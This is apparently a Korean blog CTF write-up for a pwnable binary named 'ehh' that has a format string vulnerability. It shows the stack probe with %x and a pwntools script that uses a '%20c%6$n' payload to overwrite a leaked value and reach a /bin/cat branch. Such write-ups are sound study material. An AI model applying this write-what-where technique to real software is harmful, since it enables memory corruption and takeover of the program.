반응형
FSB 취약점을 가지는 pwnable problem
[nroses@localhost Ehh]$ ./ehh
>Input interesting text here< 0x56625028
AAAA %x %x %x %x %x %x
AAAA ffc03808 18 0 0 56625000 41414141
우선 프로그램 흐름은 GDB를 통해 아래와 같이 알 수 있다.
1. >Input interesting text here< [ Value ] 을 출력한다.
2. read를 통해서 0x18 만큼 입력을 받는다.
3. printf( 입력 받은 것 ) 을 실행.
1번에서의 Value 값이 cmp 비교로 0x18이 되어야 /bin/cat/ 실행이 가능하다.
위에서와 깉이 AAAA 입력받고 6번째에서 입력값이 출력되는 것을 알 수 있다.
from pwn import *
#r = process("./ehh")
#r = remote("18.222.213.102", 12345)
print r.recvuntil(">Input interesting text here< ")
addr = int(r.recvline(), 16)
data = p32(addr)
data += "%20c%6$n" # 0x18 - addr(4)
r.sendline(data)
r.interactive()
반응형
'[ ★ ]Study > CTF' 카테고리의 다른 글
Pwntools 설치(install) (0) | 2019.04.03 |
---|---|
X-MAS 2018 Greetings from Santa (0) | 2019.01.01 |
TUCTF2018 Shella_Easy(pwn) (0) | 2018.12.15 |
P.W.N CTF ImportantService(pwn) (0) | 2018.12.01 |
RITSEC2018 ezpwn (0) | 2018.11.19 |
댓글